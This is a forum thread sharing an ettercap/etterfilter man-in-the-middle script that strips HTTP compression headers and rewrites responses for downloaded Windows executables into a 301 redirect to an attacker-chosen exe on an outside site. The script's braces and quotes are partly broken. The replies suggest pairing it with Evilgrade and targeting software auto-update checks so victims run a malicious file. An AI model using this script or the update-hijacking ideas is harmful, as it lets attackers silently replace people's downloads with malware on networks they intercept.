Jump to content

ettercap / etterfilter man in the middle ownage


Recommended Posts

ettercap / etterfilter man in the middle ownage

Basically replace any EXE downloaded with your own :)

08/14/2008 - VIDEO: http://blip.tv/file/1185726/

replace all downloaded EXE's with a 301 redirect to a different exe and site

# replace rmccurdy with your website
# replace the url with what ever exe you like

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
if (ip.proto == TCP && tcp.src == 80) {
   replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");


if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXE\n");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://www.rmccurdy.com/scripts/quickclean.exe
msg("redirect success\n");


Link to comment
Share on other sites

Dude, Boris, it's a good script, especially if you integrate it with Evilgrade. Yes, rewriting links would be good too but then you are a lot more detectable. Now, if you can download, modify images into GIFs and rewrite links while adding execution to those GIFs. THEN you have something.

Link to comment
Share on other sites

So many apps check for updates every time you start them now... I wonder if anyone has ever compiled a list of the most popular of these apps to target for MITM redirection attacks. Like if Firefox were redirected to an exploit site and said "oh look, new version available"... and the exe offered wasn't called "haxploit-1337.exe" a lot of ppl would run it.

Link to comment
Share on other sites

  • 4 months later...

There is a Man in the Middle plug in that you can get for Ettercap then all you have to do is supply the website with modified links. I did something like this for Cyber Security and redirected traffic from Microsoft.com to a site about switching to Linux.

I imagine if you somehow spoofed the site that you wanted to, you could modify the links to suit your needs.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...